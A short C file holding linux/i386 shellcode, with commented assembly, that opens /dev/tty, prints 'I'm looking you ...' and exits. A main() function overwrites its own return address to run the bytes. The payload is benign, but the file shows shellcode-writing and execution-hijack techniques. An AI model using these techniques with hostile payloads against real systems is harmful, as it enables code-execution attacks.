/* * __ ___ _ * / \ | \ | | /\-----------<>----------------> * / /\ \| |\ \| |/ / * / /__\ \ /| / Author: ORK * \______/ |\ \| | \ email: orkmail@katamail.com *<--------|_| \_\_|\_\ * * * This is a simple linux/i386 ShellCode that write "I'm looking you ..." to * the current tty (/dev/tty). * * * ASM Code: * * xor %eax, %eax # 0x31 0xc0 * xor %ecx, %ecx # 0x31 0xc9 * xor %edx, %edx # 0x31 0xd2 * jmp call # 0xeb 0x20 * pop: * popl %esi # 0x5e * * # fd = open("/dev/tty", O_RDWR|O_NONBLOCK|O_APPEND) * movb $5, %al # 0xb0 0x05 * leal (%esi), %ebx # 0x8d 0x1e * movw $06002, %cx # 0x66 0xb9 0x02 0x0c * movb %dl,0x8(%esi) # 0x88 0x56 0x08 * int $0x80 # 0xcd 0x80 * * # write(fd, BUFF, sizeof(BUFF)) * leal 0x9(%ebx), %ecx # 0x8d 0x4b 0x09 * movb $4, %al # 0xb0 0x04 * movl %edx, %ebx # 0x89 0xd3 * movb $14, %dl # 0xb2 0x14 * int $0x80 # 0xcd 0x80 * * # exit(0); * xor %eax, %eax # 0x31 0xc0 * xor %ebx, %ebx # 0x31 0xdb * inc %eax # 0x40 * int $0x80 # 0xcd 0x80 * call: * call pop # 0xe8 0xdb 0xff 0xff 0xff * .string "/dev/tty I'm looking you ...\n" * */ char shellcode[]= "\x31\xc0\x31\xc9\x31\xd2\xeb\x20\x5e\xb0\x05\x8d\x1e\x66\xb9\x02" "\x0c\x88\x56\x08\xcd\x80\x8d\x4b\x09\xb0\x04\x89\xd3\xb2\x14\xcd" "\x80\x31\xc0\x31\xdb\x40\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x64\x65" "\x76\x2f\x74\x74\x79\x20\x49\x27\x6d\x20\x6c\x6f\x6f\x6b\x69\x6e" "\x67\x20\x79\x6f\x75\x20\x2e\x2e\x2e\x0a"; main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; }